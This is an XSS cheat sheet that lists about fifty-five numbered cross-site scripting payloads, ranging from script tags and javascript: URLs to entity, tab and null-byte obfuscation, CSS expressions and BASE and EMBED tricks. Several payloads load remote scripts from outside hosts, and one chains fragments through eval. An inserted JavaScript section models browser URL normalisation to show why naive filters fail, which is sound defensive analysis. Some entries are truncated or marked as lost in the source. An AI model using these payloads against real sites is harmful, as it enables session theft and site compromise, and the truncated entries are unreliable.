(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative popups (odd tag names and attribute tricks)
<q/oncut=alert()>
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command (quoted, with semicolon)
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (the semicolons are required here)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode (see the encoding calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (see the encoding calculator)
<IMG SRC=jav..omitted..S')>

(9) Long (7-digit) UTF-8 Unicode encoding without semicolons (see the encoding calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (see the encoding calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab splitting the JavaScript (a literal tab character between "jav" and "ascript")
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab splitting the JavaScript
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multiline injection with the JavaScript spread over many lines, an extreme XSS example
[payload lost in the source]
(16) Working around an input length limit (all fragments must land on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null bytes are basically useless domestically, since there is nowhere to exploit them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" &#14;  javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and some other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag, part 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS (note the missing closing >)
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape filter
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY background image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra leading character (any of code points 1-32, 34, 39, 160, 8192-8, 13, 12288, 65279 works)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
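The payloads in items (3) through (19), (40) and (47) all exist for one reason: the browser normalises an attribute URL (entity-decodes it, skips leading control characters and whitespace, strips tabs, newlines and carriage returns) before it looks at the scheme, while a naive filter compares the raw text. The following JavaScript is an added example written for this page, not code from the original cheat sheet. It models that normalisation, runs the cheat sheet's SRC/url() values (constructed here from the items above) through both the model and a literal "javascript:" substring filter, and reports which ones the filter misses. Its assumptions are marked in comments: "8192-8" in item (47) is read as U+2000..U+2008, and NUL stripping models the old-IE behaviour item (17) targets rather than current browsers.

```javascript
// Added example for this page; not part of the original cheat sheet.
// Models a browser's attribute-URL normalisation and compares it with a naive
// substring filter over the cheat sheet's payload variants.

// Leading code points a browser skips before the scheme, per item (47):
// 1-32, 34, 39, 160, 8192-8, 13, 12288, 65279.
// Assumption: "8192-8" is read as U+2000..U+2008 (Unicode space characters).
// 34 and 39 are the quote characters CSS url() accepts around its argument.
function isIgnorableLeading(code) {
  return (code >= 1 && code <= 32) || code === 34 || code === 39 || code === 160 ||
    (code >= 8192 && code <= 8200) || code === 12288 || code === 65279;
}

// Decode HTML numeric character references. The semicolon is optional (which is
// what items (9) and (10) rely on) and decimal values may be zero-padded.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, num) => {
    const code = num[0].toLowerCase() === 'x'
      ? parseInt(num.slice(1), 16)
      : parseInt(num, 10);
    return String.fromCodePoint(code);
  });
}

// Normalise the way a browser does: entity-decode first (the HTML parser does
// this before the URL parser sees the value), drop ignorable leading characters,
// then strip tab/LF/CR anywhere in the value (items 11-15).
// Assumption: NUL removal models the old-IE behaviour of item (17), not current browsers.
function normalizeUrl(raw) {
  let s = decodeNumericEntities(raw);
  let i = 0;
  while (i < s.length && isIgnorableLeading(s.codePointAt(i))) i++;
  s = s.slice(i);
  return s.replace(/[\t\n\r\0]/g, '');
}

// Scheme as the browser would resolve it (lower-cased), or null if there is none.
function urlScheme(raw) {
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(normalizeUrl(raw));
  return m ? m[1].toLowerCase() : null;
}

// The kind of filter these payloads were written to beat: a literal,
// case-sensitive substring check on the raw attribute value.
function naiveFilterBlocks(raw) {
  return raw.includes('javascript:');
}

// Constructed sample inputs: the SRC / url() values from the items above,
// plus one benign control (item 0).
const PAYLOADS = [
  { item: 3,  value: "javascript:alert('XSS')" },
  { item: 4,  value: "JaVaScRiPt:alert('XSS')" },
  { item: 7,  value: "javascript:alert(String.fromCharCode(88,83,83))" },
  { item: 8,  value: "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')" },
  { item: 9,  value: "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')" },
  { item: 10, value: "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29" },
  { item: 11, value: "jav\tascript:alert('XSS');" },
  { item: 13, value: "jav\nascript:alert('XSS');" },
  { item: 14, value: "jav\rascript:alert('XSS');" },
  { item: 17, value: "java\0script:alert(\"XSS\")" },
  { item: 19, value: " &#14;  javascript:alert('XSS');" },
  { item: 40, value: "vbscript:msgbox(\"XSS\")" },
  { item: 47, value: "&#1;javascript:alert('XSS')" },
  { item: 0,  value: "https://example.com/logo.png" },
];

const SCRIPT_SCHEMES = new Set(['javascript', 'vbscript']);

// One record per payload: what the browser resolves the scheme to, whether that
// scheme runs script, and whether the naive filter would have stopped it.
function evaluate() {
  return PAYLOADS.map(({ item, value }) => {
    const scheme = urlScheme(value);
    return {
      item,
      scheme,
      executes: SCRIPT_SCHEMES.has(scheme),
      naiveBlocked: naiveFilterBlocks(value),
    };
  });
}

// Item numbers the browser would execute but the naive filter lets through.
function missedByNaiveFilter() {
  return evaluate().filter(r => r.executes && !r.naiveBlocked).map(r => r.item);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(evaluate());
  console.log('missed by naive filter:', missedByNaiveFilter());
}
```

Run it with node. The filter catches only the payloads that contain the literal lower-case text "javascript:" (items 3, 7, 19 and 47); every case, entity, tab, newline, CR, NUL and VBScript variant gets through, while urlScheme() resolves all thirteen of them to a script scheme. The practical lesson is the same as the cheat sheet's: decode and normalise the value the way the browser will, then allow-list the scheme (http, https, mailto, relative), instead of blacklisting strings in the raw input.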
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (an open angle bracket followed by any letter is enough)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with a comment-split expression (the comment-split prefix is lost in the source; only the tail survives)
exp[...]pression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>